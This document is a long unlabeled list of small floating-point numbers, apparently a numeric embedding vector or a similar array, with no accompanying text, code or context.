0.024533545598387718, -0.003838935401290655, -0.02080599032342434, 0.010863370262086391, 0.019573373720049858, -0.0271769892424345, 0.013707301579415798, 0.022068310528993607, -0.000801479909569025, -0.022632641717791557, 0.0221425648778677, 0.025424594059586525, 0.01783582754433155, -0.0171526912599802, -0.00833873264491558, -0.02634534426033497, 0.00864317361265421, -0.0037646815180778503, -0.024281080812215805, -0.021830696612596512, 0.04701767861843109, 0.0127419987693429, 0.01831105351448059, 0.002084683161228895, 0.0010042863432317972, -0.00232600886374712, -0.01915755122900009, -0.021919801831245422, 0.0027455443050712347, -0.017301198095083237, 0.029048193246126175, -0.03834480419754982, 0.010217360220849514, 0.01926150545477867, -0.003850073553621769, 0.017791274935007095, -0.02385040745139122, -0.015014173462986946, 0.014420140534639359, -0.013633047230541706, -0.000759247865062207, -0.01667746528983116, -0.013811257667839527, 0.013128119520843029, -0.02710273675620556, -0.005654447712004185, 0.004492371343076229, -0.0018424291629344225, -0.05245307460427284, 0.022662343457341194, -0.030503572896122932, -0.016454702243208885, -0.027043333277106285, -0.025053324177861214, -0.005669298581779003, -0.013707301579415798, -0.0027845276053994894, 0.007002159021794796, -0.017791274935007095, 0.01106385700404644, -0.005216348450630903, 0.022781148552894592, 0.004277034662663937, -0.004629741422832012, 0.004540636669844389, 0.021800994873046875, -0.018756577745079994, -0.0031483725178986788, 0.023612795397639275, -0.014531522057950497, -0.01312069408595562, -0.01058120559900999, 0.010306465439498425, -0.004444106016308069, 0.0073363021947443485, 0.03890913352370262, -0.0022628929000347853, -0.021400023251771927, -0.0058103809133172035, 0.0068313744850456715, 0.021489128470420837, 0.01402659434825182, 0.034780606627464294, 0.011279193684458733, -0.011576210148632526, 0.0007606401341035962, -0.023687047883868217, 0.00713210366666317, 0.04989873617887497, -0.020731735974550247, -0.007447683252394199, -0.007399418391287327, -0.02863237075507641, -0.008479814976453781, 0.0012716009514406323, -0.014182527549564838, -0.015006748028099537, 0.0042213439010083675, 0.0520966574549675, 0.032374776899814606, 0.015697311609983444, 0.0052943155169487, -0.021622786298394203, 0.0027121298480778933, 0.0031298091635107994, -0.013180097565054893, -0.01135344710201025, -0.017048735171556473, 0.005866071674972773, 0.010172807611525059, 0.014672604389488697, 0.028469011187553406, 0.032968807965517044, -0.015860669314861298, 0.0049750227481126785, 0.02462265081703663, 0.007818954065442085, 0.0006088833906687796, -0.0028272238560020924, 0.03917644917964935, 0.04977992922067642, -0.006022005341947079, -0.013714727014303207, -0.02595922350883484, -0.0028030911926180124, 0.008472389541566372, 0.03457269445061684, 0.021058455109596252, -0.03270149230957031, -0.028973938897252083, 0.03519643098115921, 0.00043229793664067984, 0.011412850581109524, -0.003827797481790185, -0.01973673142492771, 0.016276491805911064, 0.005123530980199575, -0.017806125804781914, -0.022647492587566376, -0.015727011486887932, -0.01368502527475357, -0.01917240209877491, 0.010573780164122581, -0.014798836782574654, 0.0030592677649110556, 0.02184554748237133, 0.019513970240950584, 0.007997163571417332, -0.014761709608137608, 0.005405696574598551, 0.01024706196039915, 0.01531118992716074, -0.00767787080258131, -0.0006455463590100408, 0.028543265536427498, 0.04018630459904671, 0.0013207943411543965, 0.011561359278857708, 0.0024596662260591984, 0.0077224234119057655, -0.007759550586342812, -0.04476035386323929, -0.025914670899510384, -0.014145400375127792, 0.019424865022301674, -0.0392952561378479, -0.01773187145590782, 0.017301198095083237, 0.0351073257625103, 0.009266908280551434, -0.03460239619016647, 0.010893072001636028, 0.02374645136296749, -0.004767111502587795, 0.00767787080258131, 0.01669231615960598, 0.0041582281701266766, -0.012452407740056515, -0.02376130223274231, 0.019707029685378075, 0.0036625820212066174, -0.009890642017126083, 0.017390303313732147, -0.01926150545477867, -0.019410014152526855, -0.04909679293632507, -0.022662343457341194, -0.005687861703336239, -0.0038315101992338896, -0.007863505743443966, 0.03656270354986191, 0.009162952192127705, 0.00507897837087512, -0.034958817064762115, -0.020286211743950844, -0.005502226762473583, -0.0019268931355327368, -0.030473871156573296, 0.009905492886900902, 0.0014525952283293009, -0.0006812810897827148, 0.017523961141705513, -0.0012233358575031161, 0.020568378269672394, 0.010276763699948788, -0.01945456676185131, -0.012289049103856087, 0.010536652989685535, -0.0053611439652740955, -0.024592949077486992, 0.010989602655172348, -0.021890100091695786, 0.014479544013738632, 0.0006070270319469273, 0.0065640597604215145, 0.012437556870281696, -0.01449439488351345, 0.0007453252328559756, 0.0339786633849144, 0.03665180876851082, 0.005104967392981052, -0.01473200786858797, 0.01531118992716074, 0.0021570806857198477, 0.009868365712463856, -0.01297961175441742, 0.014665178954601288, -0.016929928213357925, -0.011197513900697231, 0.03644389659166336, -0.016647763550281525, -0.0029980081599205732, 0.029924390837550163, 0.0018173684366047382, -0.014835963025689125, -0.014761709608137608, 0.002960880985483527, -0.0029348921962082386, -0.032582685351371765, 0.011724717915058136, 0.017672469839453697, -0.013625621795654297, 0.017523961141705513, -0.003036991460248828, 0.000545767426956445, 0.008108544163405895, 0.022454431280493736, -0.0015222084475681186, 0.014353311620652676, 0.012868230231106281, -0.029226401820778847, -0.0005318447947502136, 0.014835963025689125, -0.05150262266397476, -0.04680976644158363, 0.016439851373434067, 0.004458956886082888, -0.019216952845454216, -0.029612524434924126, -0.003081544069573283, 0.03519643098115921, 0.017910081893205643, -0.0004919331986457109, 0.027830425649881363, -0.0008576345280744135, 0.00834615807980299, 0.008316456340253353, 0.007648169528692961, -0.022914806380867958, -0.01335830707103014, -0.009742134250700474, -0.02319697104394436, 0.019424865022301674, 0.011338597163558006, -0.014813687652349472, -0.0172714963555336, -0.021310918033123016, -0.012422706000506878, 0.036859720945358276, 0.023716749623417854, -0.007128390949219465, 0.010373293422162533, 0.020909946411848068, -0.0020364178344607353, -0.010336167179048061, 0.012660318985581398, -0.003536350093781948, -0.0007499661296606064, -0.0016892801504582167, 0.01716754212975502, -0.003972592763602734, 0.008606046438217163, 0.0011017448268830776, -0.019499119371175766, -0.0027102737221866846, 0.012415280565619469, -0.0017059872625395656, -0.05610637739300728, 0.033147018402814865, -0.006942755542695522, 0.00608512107282877, -0.018949639052152634, 0.028008636087179184, 0.006426689680665731, 0.0023055889178067446, 0.011397999711334705, -0.0073363021947443485, -0.02414742484688759, -0.018548667430877686, -0.01178412139415741, 0.018548667430877686, 0.0019213240593671799, -0.025691907852888107, 0.032879702746868134, 0.05381935089826584, -0.007533075753599405, 0.05381935089826584, -0.025914670899510384, -0.006660590413957834, -0.0009634465677663684, 0.0044069793075323105, 0.015816116705536842, -0.0048747798427939415, 0.007982312701642513, 0.029924390837550163, 0.001797876670025289, -0.04511677473783493, 0.017910081893205643, 0.00500843720510602, -0.007473672274500132, -0.06920479238033295, 0.00930403545498848, -0.01426420733332634, -0.008561494760215282, -0.003965167328715324, 0.01831105351448059, -0.01136087253689766, 0.004243620205670595, 0.028944237157702446, -0.00428817281499505, -0.014189952984452248, -0.021103007718920708, 0.01049210038036108, 0.022068310528993607, 0.004718846175819635, -0.02462265081703663, -0.010239636525511742, 0.0017013463657349348, -0.006842512637376785, 0.023924661800265312, -0.0020438432693481445, 0.003703421913087368, -0.01465032808482647, -0.004548062104731798, 0.02041986957192421, -0.026196835562586784, -0.027607664465904236, 0.013967190869152546, 0.013633047230541706, -0.01783582754433155, 0.004425542429089546, -0.023984065279364586, -0.023449435830116272, -0.010351017117500305, -0.040216006338596344, 0.008034290745854378, -0.05551234260201454, 0.007833804935216904, 0.002871776232495904, 0.011888076551258564, 0.023701898753643036, -0.0070355734787881374, 0.014011743478477001, 0.022692043334245682, -0.0008896565996110439, -0.011954905465245247, -0.01216281671077013, 0.001958451233804226, -0.014108273200690746, -0.03198865428566933, 0.0008998665143735707, -0.0008859438821673393, 0.03825569897890091, -0.006166800856590271, -0.0013653467176482081, -0.021028753370046616, -0.006036856211721897, 0.02119211107492447, -0.005439110565930605, -0.0013504959642887115, -0.017509110271930695, -0.011576210148632526, 0.02557310275733471, -0.015563653782010078, -0.007744699716567993, -0.02059808000922203, -0.02603347785770893, 0.01985553838312626, -0.005212635733187199, -0.011836099438369274, 0.0009653029264882207, -0.024667203426361084, -0.0484730564057827, 0.007247197441756725, -0.023597944527864456, 0.01822194829583168, -0.013885511085391045, 0.00017368490807712078, 0.020286211743950844, 0.02594437263906002, -0.01744970679283142, 0.011583635583519936, 0.018281351774930954, -0.028394756838679314, -0.022365326061844826, -0.007670445367693901, -0.0033841293770819902, -0.01973673142492771, 0.00314651639200747, -0.013001888059079647, -0.0072731864638626575, -0.03519643098115921, 0.020063450559973717, -0.018147695809602737, 0.004210205748677254, -0.005576480645686388, -0.014115698635578156, -0.006497231312096119, 0.01802888885140419, -0.04006749764084816, 0.02851356379687786, 0.019692178815603256, -0.019588224589824677, -0.009103548713028431, 0.0160240288823843, -0.004143377300351858, 0.0031186710111796856, -0.02376130223274231, 0.021964354440569878, 0.011561359278857708, -0.036592405289411545, -0.004715133458375931, -0.005884635262191296, -0.012578640133142471, -0.013722152449190617, 0.004418117459863424, -0.017627917230129242, 0.002392837544903159, -0.006515794899314642, 0.013796406798064709, 0.01482853852212429, -0.023256374523043633, 0.012964760884642601, 0.02128121629357338, 0.006047993898391724, -0.005858646240085363, 0.006790535058826208, 0.006099971942603588, 0.01802888885140419, 0.019023893401026726, -0.01522208470851183, -0.01869717426598072, -0.02319697104394436, -0.033919259905815125, 0.018429860472679138, 0.017345750704407692, 0.017226943746209145, -0.014457267709076405, -0.0020809704437851906, -0.012534087523818016, 0.00429559824988246, 0.014442416839301586, 0.008925339207053185, -0.010306465439498425, -0.005832657217979431, 0.012073712423443794, -0.01642500050365925, 0.025528550148010254, 0.004982448183000088, -0.029642226174473763, 0.037542857229709625, 0.04161198064684868, 0.038790326565504074, -0.025439444929361343, -0.024592949077486992, 0.023597944527864456, -0.02567705698311329, -0.006289320066571236, 0.013722152449190617, -0.0069056288339197636, -0.01488794106990099, 0.02488996461033821, 0.01177669595927, 0.011605910956859589, 0.017390303313732147, -0.002656439319252968, 0.01263804268091917, 0.01488794106990099, -0.04398811236023903, 0.014991897158324718, 0.021310918033123016, -0.01992979273200035, 0.029627375304698944, 0.05732414498925209, -0.004106250125914812, -0.03457269445061684, -0.00036755765904672444, -0.017212092876434326, 0.024310782551765442, -0.019395163282752037, -0.0011704297503456473, 0.03602807596325874, -0.03071148321032524, 0.0053425803780555725, -0.02423652820289135, 0.04909679293632507, -0.016736866906285286, 0.03186984732747078, -0.012133114971220493, -0.0014247499639168382, -0.02863237075507641, 0.006575197912752628, 0.029746180400252342, 0.00779667729511857, -0.02202375791966915, -0.004859928973019123, -0.019410014152526855, -0.00862832274287939, -0.016098283231258392, -0.010351017117500305, -0.0014739433536306024, -0.009007018990814686, 0.0024782295804470778, -0.001874915324151516, -0.0012855236418545246, -0.0027622515335679054, -0.008561494760215282, 0.014598350040614605, -0.02068718522787094, 0.02367219887673855, 0.002533920109272003, 0.023018762469291687, -0.03804778680205345, -0.008294180035591125, -0.00428817281499505, -0.030681781470775604, 0.028884833678603172, -0.017197243869304657, -0.013202373869717121, -0.024474142119288445, -0.014605775475502014, 0.011182663030922413, 0.010521802119910717, -0.015964625403285027, -0.01632104441523552, -0.0309193953871727, 0.019513970240950584, 0.004577763378620148, 0.0053648566827178, -0.007997163571417332, 0.07562034577131271, 0.002164506120607257, 0.02061293087899685, -0.016618061810731888, -0.03522613272070885, 0.01287565566599369, 0.017583364620804787, 0.011813823133707047, 0.012897931970655918, -0.038196295499801636, 0.01773187145590782, 0.03329552710056305, -0.008086268790066242, 0.004885917995125055, 0.014991897158324718, 0.013001888059079647, -0.03225596994161606, -0.021800994873046875, 0.024919666349887848, 0.015667609870433807, 0.01240785513073206, 0.013001888059079647, -0.0030388478189706802, -0.020464422181248665, 0.030384765937924385, -0.0012743854895234108, -0.005390845704823732, -0.03080058842897415, -0.04342377930879593, -0.004098824691027403, -0.006512082181870937, 0.00500843720510602, -0.028097741305828094, -0.0036291677970439196, 0.0030759749934077263, 0.009846089407801628, 0.008977317251265049, 0.01273457333445549, -0.013039015233516693, -0.0309193953871727, -0.01306871697306633, -0.018266500905156136, 0.001881412579677999, 0.008316456340253353, 0.006879639811813831, -0.0004290493088774383, 0.025899820029735565, 0.004807950928807259, -0.023330628871917725, 0.018429860472679138, -0.01159848552197218, -0.0017700314056128263, -0.0031428036745637655, 0.0040839738212525845, 0.014680029824376106, -0.009311460889875889, -0.024206826463341713, -0.017212092876434326, 0.011249491944909096, 0.013046440668404102, -0.002491224091500044, 0.019484268501400948, -0.014947344549000263, 0.011657889001071453, 0.006742269732058048, -0.01307614240795374, -0.01973673142492771, 0.0013245069421827793, -0.008747129701077938, 0.016632912680506706, 0.022261369973421097, 0.0023408595006912947, 0.006319021340459585, 0.007982312701642513, 0.013662748970091343, -0.00896989181637764, -0.014776560477912426, 0.029553120955824852, -0.02824624814093113, -0.010685160756111145, 0.0008223638287745416, 0.01918725296854973, -0.0034602396190166473, 0.0221425648778677, -0.006137099117040634, 0.037928979843854904, -0.025528550148010254, 0.002355710370466113, 0.0044700950384140015, -0.0017236226703971624, -0.03014715388417244, -0.01110840868204832, 0.004767111502587795, -0.03394896164536476, 0.011702441610395908, 0.03653300181031227, -0.002723268000409007, -0.017197243869304657, -0.037156738340854645, -0.015875520184636116, 0.013024164363741875, -0.006419264245778322, -0.0037015655543655157, -0.003306162543594837, -0.02612258307635784, 0.0032671792432665825, 0.006861076224595308, 0.010239636525511742, -0.01718239299952984, -0.006003441754728556, -0.00873227883130312, -0.008658024482429028, -0.002170075196772814, -0.025587953627109528, -0.009549073874950409, -0.005550491623580456, 0.0001583700068295002, 0.007091263774782419, -0.013766705058515072, -0.024444440379738808, -0.028469011187553406, -0.005231199320405722, -0.00565073499456048, -0.03947346284985542, 0.015667609870433807, 0.00882880948483944, 0.02812744304537773, -0.02080599032342434, 0.029166998341679573, 0.003946603741496801, 0.020672334358096123, 0.010618331842124462, 0.018266500905156136, 0.014085996896028519, 0.020909946411848068, -0.01368502527475357, 0.01015795674175024, 0.009667879901826382, 0.005873497109860182, 0.012452407740056515, 0.0004766183265019208, 0.01792493276298046, -0.00013795014820061624, 0.01651410572230816, 0.0033135879784822464, -0.006118535529822111, 0.003868637140840292, 0.0005615464178845286, 0.024281080812215805, 0.022291071712970734, 0.027904679998755455, -0.023033613339066505, 0.014724582433700562, 0.030741184949874878, 0.010039150714874268, -0.0016094569582492113, 0.02604832872748375, -0.014420140534639359, -0.0028439308516681194, 0.027741320431232452, -0.015081001445651054, 0.011487104929983616, -0.0010813248809427023, -0.03329552710056305, -0.006345010362565517, 0.04024570807814598, -0.0007699219277128577, -0.01416025124490261, -0.02698392979800701, 0.02395436353981495, 0.006073982920497656, -0.013529092073440552, -0.021593084558844566, -0.011665314435958862, 0.009081273339688778, 0.03691912442445755, 0.00930403545498848, -0.006976169999688864, 0.017494259402155876, -0.015340890735387802, 0.025884969159960747, 0.012192518450319767, 0.02022680826485157, 0.004106250125914812, -0.0008952256757766008, 0.003155797952786088, -0.00834615807980299, 0.008561494760215282, -0.023390032351017, 0.012608340941369534, 0.013276628218591213, 0.021132709458470345, -0.016276491805911064, -0.027043333277106285, 0.020390167832374573, -0.027637366205453873, 0.0032430465798825026, -0.032196566462516785, 0.0011759988265112042, -0.038285400718450546, -0.012764275074005127, -0.012467258609831333, 0.00839813519269228, 0.008004589006304741, 0.008695151656866074, -0.049067091196775436, -0.008138245902955532, 0.02347913756966591, -0.00519778486341238, 0.0052794646471738815, -0.011286619119346142, -0.017212092876434326, -0.0043884157203137875, -0.007184081245213747, 0.029820434749126434, -0.013833533972501755, -0.008888212032616138, -0.001673501101322472, 0.015786414965987206, -0.0032319084275513887, 0.0003937786095775664, -0.021904950961470604, -0.004340150393545628, -0.014123124070465565, -0.01975158229470253, 0.0025376328267157078, 0.0029813009314239025, -0.029508568346500397, -0.003101963782683015, 0.02386525832116604, -0.027622515335679054, -0.02203860878944397, 0.012808827683329582, 0.008034290745854378, -0.008546643890440464, -0.014011743478477001, 0.007592478767037392, -0.0003134914149995893, -0.0032541847322136164, -0.0004141984973102808, -0.0005411265301518142, -0.0085763456299901, -0.021593084558844566, -0.003595753340050578, 0.00872485339641571, -0.0003341433184687048, 0.004789387807250023, 0.017226943746209145, -0.003471377771347761, -0.0036365932319313288, -0.0006195573951117694, 0.007533075753599405, -0.0004784746852237731, -0.01575671322643757, -0.005001011770218611, 0.0009049715008586645, -0.00467429356649518, -0.021964354440569878, -0.010195083916187286, -0.015623056329786777, 0.054146070033311844, -0.004666868597269058, -0.00887336116284132, 0.01531118992716074, -0.03769136592745781, 0.010477249510586262, -0.01202173437923193, -0.009831239469349384, -0.0015082858735695481, 0.005264613777399063, 0.00977926142513752, 0.008034290745854378, -0.01473200786858797, -0.02003374882042408, -0.00872485339641571, 0.007811528164893389, 0.007466246839612722, 0.004919332452118397, -0.019098147749900818, 0.011798972263932228, -0.0035177867393940687, 0.03264208883047104, 0.0015788271557539701, -0.024385036900639534, -0.015266637317836285, -0.011954905465245247, -0.032374776899814606, 0.02080599032342434, -0.01984068751335144, -0.0005903198616579175, -0.004711420740932226, -0.010544078424572945, 0.002760395174846053, -0.021310918033123016, 0.0003868172934744507, 0.014115698635578156, -0.022543536499142647, 0.02156338281929493, 0.03184014558792114, -0.004559199791401625, 0.015801265835762024, 0.018088292330503464, 0.013202373869717121, -0.015088426880538464, 0.012422706000506878, 0.0013625621795654297, -0.020063450559973717, -0.03421627730131149, -0.01097475178539753, -0.0050567020662128925, 0.00021487272169906646, -0.012348451651632786, -0.019796134904026985, 0.009133250452578068, -0.007648169528692961, 0.00600715447217226, -0.047552306205034256, 0.023701898753643036, -0.03184014558792114, 0.028365055099129677, -0.0008868720615282655, -0.01554880291223526, -0.02080599032342434, -0.014895366504788399, -0.01764276809990406, -0.008977317251265049, 0.003566051833331585, -0.0017226944910362363, -0.003619886003434658, -0.028691772371530533, 0.016439851373434067, -0.01192520372569561, 0.03457269445061684, -0.0018879097187891603, -0.004225056618452072, 0.007451395969837904, 0.034780606627464294, -0.013944914564490318, -0.011019304394721985, -0.014078572392463684, -0.01802888885140419, 0.043928708881139755, 0.004254758358001709, 0.00016080647765193135, 0.01083366945385933, 0.004919332452118397, 0.016915077343583107, -0.01402659434825182, -0.00755906431004405, -0.02374645136296749, -0.03356283903121948, 0.005713850725442171, 0.006953893695026636, -0.00021162410848774016, -0.0015927498461678624, 0.019573373720049858, -0.002409544540569186, 0.02024165913462639, 0.022825701162219048, -0.012311325408518314, -0.011553933843970299, 0.014531522057950497, 0.00779667729511857, 0.008041716180741787, -0.007310313172638416, -0.02442958950996399, -0.00943769235163927, 0.011865800246596336, 0.017004182562232018, 0.01297218631953001, 0.025914670899510384, -0.0017226944910362363, 0.00519778486341238, -0.0029163286089897156, -0.001014496199786663, 0.005101254675537348, 0.04131496697664261, -0.030414467677474022, -0.021414874121546745, 0.016618061810731888, -0.012608340941369534, 0.006890777964144945, -0.01320979930460453, -0.0023222961463034153, -0.02423652820289135, 0.005156945437192917, -0.00977183599025011, -0.03359254077076912, -0.022053459659218788, 0.005743552464991808, 0.01753881201148033, 0.013128119520843029, -0.003876062575727701, 0.026657212525606155, -0.011620761826634407, 0.008242201991379261, -0.022008907049894333, 0.016855673864483833, -0.027340348809957504, -0.021058455109596252, 0.01168016530573368, -0.0068499380722641945, -0.0008952256757766008, 0.019499119371175766, 0.02518698014318943, 0.008450113236904144, -0.01927635632455349, -0.012058861553668976, 0.02108815684914589, -0.014538947492837906, 0.014056296087801456, 0.009860940277576447, 0.0013495677849277854, -0.021904950961470604, -0.02538004145026207, -0.01154650840908289, 0.006979882717132568, 0.026092881336808205, 0.026389896869659424, -0.01642500050365925, 0.01287565566599369, -0.014397864229977131, -0.0025803290773183107, -0.007388280238956213, -0.011346021667122841, -0.005880922544747591, -0.0193654615432024, 0.00720264483243227, -0.00792290922254324, 0.00953422300517559, 0.005494801327586174, 0.004057984799146652, 0.020657483488321304, -0.0003986515512224287, -0.005153232719749212, -0.00007100545917637646, -0.01216281671077013, -0.0018999760504812002, -0.014598350040614605, 0.009244631975889206, 0.005168083589524031, -0.005858646240085363, 0.01498447172343731, -0.00934858713299036, -0.002817942062392831, 0.001430319040082395, -0.020256510004401207, 0.011865800246596336, -0.004826514516025782, -0.011865800246596336, 0.012793976813554764, -0.020835692062973976, 0.02441473864018917, 0.0034862286411225796, 0.010573780164122581, -0.01331375539302826, 0.006526933051645756, 0.0038203720469027758, -0.005312878638505936, -0.003001720877364278, 0.024548396468162537, -0.0200485996901989, 0.010031725279986858, 0.007124678231775761, 0.026449300348758698, 0.0008075130172073841, -0.009044146165251732, -0.004778249654918909, -0.01623193919658661, -0.016053730621933937, 0.037156738340854645, 0.01360334549099207, 0.007410556543618441, -0.007930334657430649, 0.011264342814683914, -0.015236935578286648, -0.022112863138318062, -0.015400294214487076, 0.003850073553621769, -0.0007081982330419123, 0.006460104137659073, 0.02041986957192421, -0.0016410149401053786, -0.008383284322917461, 0.004299310967326164, -0.013952339999377728, 0.005918049719184637, -0.015296339057385921, 0.024444440379738808, -0.02022680826485157, -0.0056470222771167755, -0.03157282993197441, 0.005335154943168163, -0.005639596842229366, 0.007165518123656511, -0.0010061427019536495, 0.013246926479041576, 0.015474548563361168, 0.0078041027300059795, 0.005168083589524031, -0.0018906942568719387, -0.006634601391851902, -0.012563789263367653, -0.008947615511715412, -0.0007624964928254485, -0.008123395033180714, -0.004195354878902435, -0.009021869860589504, 0.018281351774930954, -0.0035641954746097326, 0.012578640133142471, -0.00943769235163927, -0.008130820468068123, -0.005632171407341957, -0.0005137453554198146, 0.018340755254030228, 0.011746994219720364, 0.008658024482429028, -0.006081408355385065, -0.013514241203665733, 0.002617456018924713, -0.0022276220843195915, 0.020627781748771667, -0.01612798497080803, -0.003293168032541871, -0.005093829240649939, 0.011628187261521816, -0.004989873617887497, -0.025988925248384476, -0.01002429984509945, -0.001098032109439373, 0.018830832093954086, -0.0041396645829081535, -0.008145671337842941, 0.007492235861718655, -0.007529363036155701, 0.02977588213980198, -0.010425271466374397, 0.0018712026067078114, -0.0058289445005357265, 0.003345145843923092, -0.0034973667934536934, -0.017895231023430824, 0.0021273791790008545, -0.009630752727389336, -0.02221681736409664, 0.010217360220849514, -0.017048735171556473, -0.03656270354986191, 0.009244631975889206, 0.008093694224953651, 0.008353582583367825, 0.007893207482993603, 0.001382982125505805, 0.0024058318231254816, -0.004596326965838671, -0.010239636525511742, 0.008799107745289803, 0.00045132552622817457, 0.012207369320094585, 0.018340755254030228, -0.003684858325868845, 0.015199808403849602, 0.010610906407237053, 0.006942755542695522, 0.012444982305169106, -0.006148237269371748, -0.02281085029244423, -0.0035641954746097326, -0.024845412001013756, 0.004232482053339481, -0.00824962742626667, -0.010209934785962105, 0.007670445367693901, -0.0026620083954185247, 0.004618603270500898, 0.0017013463657349348, -0.0011982751311734319, -0.0003875134279951453, -0.006471242289990187, 0.010373293422162533, 0.004826514516025782, -0.000676640251185745, -0.015801265835762024, -0.01667746528983116, -0.017330899834632874, -0.009823814034461975, -0.0020902520045638084, 0.00644154055044055, -0.0060776956379413605, 0.01488051563501358, -0.010135680437088013, -0.035731058567762375, 0.025899820029735565, -0.014962195418775082, -0.012341026216745377, -0.03584986552596092, 0.008175373077392578, -0.004173079039901495, 0.017627917230129242, 0.008680300787091255, 0.005004724487662315, 0.0029144722502678633, 0.010135680437088013, 0.001684639253653586, -0.009734708815813065, 0.006898203399032354, -0.015801265835762024, 0.01168759074062109, 0.001134230988100171, 0.005479950457811356, 0.015199808403849602, -0.007473672274500132, 0.005617320537567139, 0.003579046344384551, -0.015905221924185753, -0.011323746293783188, 0.0014247499639168382, -0.012006883509457111, -0.013462263159453869, 0.0025135003961622715, -0.014108273200690746, -0.0003322869597468525, 0.0017106281593441963, 0.015816116705536842, 0.018147695809602737, 0.009133250452578068, -0.0163061935454607, -0.014553798362612724, 0.011754419654607773, -0.002604461507871747, -0.0044515314511954784, 0.004466382320970297, -0.015281488187611103, -0.005910624284297228, 0.027518559247255325, -0.006166800856590271, 0.01120493933558464, -0.02508302591741085, 0.003090825630351901, -0.00140061741694808, -0.028498712927103043, -0.007106114644557238, -0.01449439488351345, -0.02309301681816578, 0.000364773120963946, 0.003684858325868845, -0.005268326494842768, -0.00629303278401494, 0.03522613272070885, -0.009831239469349384, 0.013024164363741875, -0.028662072494626045, 0.001026562531478703, -0.0022406165953725576, -0.006389562971889973, -0.012519236654043198, 0.004548062104731798, -0.004254758358001709, 0.01917240209877491, 0.017330899834632874, 0.026404747739434242, 0.00016011034313123673, 0.008063992485404015, 0.019870389252901077, -0.0049378955736756325, -0.019439715892076492, 0.012771700508892536, -0.01593492366373539, 0.017999187111854553, 0.023716749623417854, 0.009088698774576187, -0.02529093623161316, -0.016632912680506706, -0.012430131435394287, -0.003660725662484765, 0.018652623519301414, 0.001958451233804226, 0.003898338647559285, 0.013269202783703804, -0.014375587925314903, -0.016484403982758522, -0.0017913795309141278, 0.002485655015334487, -0.0017496115760877728, -0.005171796306967735, 0.0022925944067537785, -0.00977926142513752, -0.014227080158889294, -0.01975158229470253, 0.000628839188721031, 0.0044886586256325245, 0.009363438002765179, 0.0009987172670662403, -0.000991291832178831, -0.018845682963728905, -0.019677329808473587, 0.006823949050158262, -0.019335759803652763, 0.001068330486305058, 0.01335830707103014, -0.00453321123495698, -0.005067840218544006, 0.003619886003434658, -0.010789116844534874, -0.000693811452947557, 0.012133114971220493, -0.0007643528515473008, 0.0086357481777668, 0.005654447712004185, 0.0128830811008811, 0.005116105545312166, 0.014590924605727196, 0.019870389252901077, -0.007265761028975248, 0.02021195739507675, -0.005416834726929665, 0.0041396645829081535, 0.014390438795089722, -0.0031372345983982086, -0.00825705286115408, 0.017910081893205643, 0.01860807090997696, -0.015979476273059845, 0.015801265835762024, -0.003913189750164747, 0.027013631537556648, -0.011746994219720364, -0.029122447595000267, -0.014034019783139229, 0.018563518300652504, 0.011732143349945545, 0.006333872210234404, -0.009801537729799747, -0.00002113050504704006, 0.0015927498461678624, 0.010380718857049942, -0.023894960060715675, -0.014531522057950497, -0.02643444947898388, 0.01153908297419548, 0.026107732206583023, -0.012073712423443794, -0.006541783921420574, -0.006686578970402479, -0.0032913116738200188, 0.009311460889875889, -0.013090992346405983, -0.006627175956964493, 0.007611042354255915, -0.02557310275733471, 0.013833533972501755, -0.013098417781293392, -0.008932764641940594, 0.016915077343583107, 0.002498649526387453, -0.016929928213357925, 0.011628187261521816, 0.009393139742314816, -0.007514512166380882, 0.014850813895463943, 0.024058319628238678, 0.00696503184735775, 0.03255298361182213, 0.018103143200278282, 0.022870253771543503, 0.0057287015952169895, 0.014420140534639359, -0.013142970390617847, -0.009474819526076317, -0.019588224589824677, -0.0012845954624935985, 0.02423652820289135, -0.0015110704116523266, 0.013343456201255322, 0.003980018198490143, -0.0006863860762678087, -0.016380447894334793, 0.011836099438369274, -0.023300927132368088, 0.0026118869427591562, -0.006757120601832867, -0.0041582281701266766, 0.006352435797452927, 0.01973673142492771, 0.001898119691759348, -0.006998446304351091, -0.024073170498013496, 0.0018879097187891603, -0.00755906431004405, -0.00008086732123047113, -0.010751989670097828, 0.008041716180741787, 0.013878085650503635, -0.02001889795064926, -0.013974616304039955, 0.02166733890771866, -0.0007160876994021237, -0.012393004260957241, 0.002890339819714427, -0.014397864229977131, -0.0423545241355896, -0.0030722622759640217, 0.011516806669533253, 0.023152420297265053, 0.022276220843195915, 0.01073713880032301, 0.003536350093781948, 0.000878518505487591, 0.0059960163198411465, -0.008412986062467098, 0.005168083589524031, -0.016825972124934196, 0.01565275900065899, -0.010893072001636028, 0.009898067452013493, -0.022276220843195915, -0.010031725279986858, 0.024667203426361084, -0.00026174559025093913, 0.005643309559673071, -0.027622515335679054, 0.013001888059079647, -0.006779396906495094, 0.003549344604834914, -0.026493852958083153, -0.022157415747642517, -0.021533681079745293, 0.015251786448061466, -0.0163061935454607, -0.006189076695591211, -0.007158092688769102, 0.006757120601832867, -0.005921761970967054, -0.013967190869152546, -0.011962330900132656, -0.01563790813088417, -0.022053459659218788, 0.0004947177367284894, 0.00232600886374712, -0.02059808000922203, 0.0128830811008811, -0.00888078659772873, -0.00274183158762753, -0.0019306058529764414, -0.009742134250700474, -0.006823949050158262, -0.005338867660611868, -0.003179930616170168, -0.021310918033123016, 0.003894626162946224, 0.012177667580544949, -0.004830227233469486, 0.003269035601988435, 0.010195083916187286, -0.004035708960145712, -0.0017394016031175852, -0.02499392069876194, -0.023523690178990364, -0.003632880514487624, 0.02070203423500061, 0.006181651260703802, 0.021697038784623146, -0.010076277889311314, -0.0058103809133172035, -0.013491964899003506, -0.016618061810731888, 0.011873225681483746, -0.014954769983887672, -0.0076036169193685055, 0.016053730621933937, -0.0035437755286693573, -0.013581070117652416, 0.016840822994709015, 0.0010182089172303677, -0.009868365712463856, -0.01632104441523552, 0.012289049103856087, -0.03207775950431824, 0.0043030232191085815, -0.0030778313521295786, 0.0032170575577765703, -0.02346428669989109, 0.01927635632455349, 0.009415416046977043, -0.003163223387673497, -0.0077224234119057655, 0.0026026051491498947, 0.004395841155201197, -0.020627781748771667, -0.025795863941311836, 0.012779125943779945, -0.029627375304698944, 0.016825972124934196, 0.021028753370046616, -0.01718239299952984, -0.018296202644705772, -0.0029534557834267616, 0.0043884157203137875, 0.015608205460011959, -0.006586336065083742, 0.00572127616032958, -0.009942620061337948, 0.01687052473425865, 0.00653807120397687, 0.015608205460011959, -0.018429860472679138, -0.013803832232952118, 0.009511946700513363, 0.009504521265625954, 0.015994327142834663, 0.014620626345276833, 0.01783582754433155, -0.011977181769907475, -0.008323881775140762, 0.0035326373763382435, -0.012214794754981995, 0.009044146165251732, 